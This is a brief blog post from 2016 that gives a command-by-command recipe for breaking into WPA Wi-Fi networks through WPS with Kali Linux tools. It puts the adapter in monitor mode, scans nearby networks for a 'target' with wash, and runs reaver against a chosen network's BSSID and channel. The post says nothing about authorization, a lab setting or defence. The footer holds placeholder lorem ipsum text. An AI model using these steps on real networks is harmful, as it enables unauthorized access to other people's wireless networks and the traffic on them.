Wifi Hacking | WPA (WPS)

by February 16, 2016 0 Comments

Wifi Hacking / WPA (WPS)





You need :

external wifi adapter or dual boot

kali linux vm (not needed if you have the dual boot)

reaver (won't teach you how to console > apt-get install reaver)
 
--
airmon-ng : to find your network adapter name - you need an external adapter if you run Kali linux in a VM, you can use internal a long as it is compatible with the monitor mode & that you have Kali in dual boot.
 

ifconfig (*your adapter name*) down :  disable the adapter
 

iwconfig (*your adapter name*) mode monitor : change the mode of the adapter to monitor
 

ifconfig (*your adapter name*) up : re-enable the adapter
 

wash -i (*your adapter name*) :  will begin to monitor the network nearby - CTRL + C when you found your target.
 

reaver -i (*your adapter name*) -b (*bssid of the network to attack*) -c (*the channel of the network*) -vv : will begin the crack of the precised wifi




Cyber Hack

Developer

Cras justo odio, dapibus ac facilisis in, egestas eget quam. Curabitur blandit tempus porttitor. Vivamus sagittis lacus vel augue laoreet rutrum faucibus dolor auctor.

0 Comments:

JNITLover. Powered by Blogger.